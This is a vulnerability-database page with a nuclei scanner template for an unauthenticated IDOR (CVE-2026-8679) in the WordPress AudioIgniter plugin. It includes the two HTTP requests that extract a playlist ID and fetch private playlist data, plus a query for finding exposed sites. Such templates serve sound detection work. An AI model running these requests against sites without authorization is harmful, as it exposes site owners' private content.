Lucene search
K

WordPress AudioIgniter <= 2.0.2 - Unauthenticated IDOR

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

Unauthenticated direct object reference in WordPress AudioIgniter up to 2.0.2 leaks playlist data via a user-controlled ID.

Related
Refs
Code
id: CVE-2026-8679

info:
  name: WordPress AudioIgniter <= 2.0.2 - Unauthenticated IDOR
  author: 0x_Akoko
  severity: high
  description: |
    The AudioIgniter plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 2.0.2. The handle_playlist_endpoint() function accepted a user-controlled playlist ID and returned track data without authentication.
  impact: |
    Unauthenticated attackers can access sensitive playlist metadata including private and draft content, leading to information disclosure.
  remediation: |
    Update to the latest version of AudioIgniter plugin.
  reference:
    - https://plugins.trac.wordpress.org/browser/audioigniter/trunk/audioigniter.php
    - https://nvd.nist.gov/vuln/detail/CVE-2026-8679
    - https://wordpress.org/plugins/audioigniter/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-8679
    epss-score: 0.01508
    epss-percentile: 0.71318
    cwe-id: CWE-639
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="audioigniter_playlist_id"
  tags: cve,cve2026,wordpress,wp-plugin,audioigniter,idor,exposure,wp

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "audioigniter_playlist_id")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: playlist_id
        part: body
        regex:
          - 'audioigniter_playlist_id=(\d+)'
        group: 1
        internal: true

  - raw:
      - |
        GET /?audioigniter_playlist_id={{playlist_id}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "\"title\"", "\"audio\"", "\"subtitle\"")'
        condition: and
# digest: 4a0a0047304502206879e822cf5a7319ab0a14722fc4a567350c7ca56261f204ff24cbadede43d34022100a2f4f705ffdf01ac9c04f6b46fda3545bc62d510d49c14ac6bdac7db802ab097:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 May 2026 01:55Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.17.5
EPSS0.01508
SSVC
12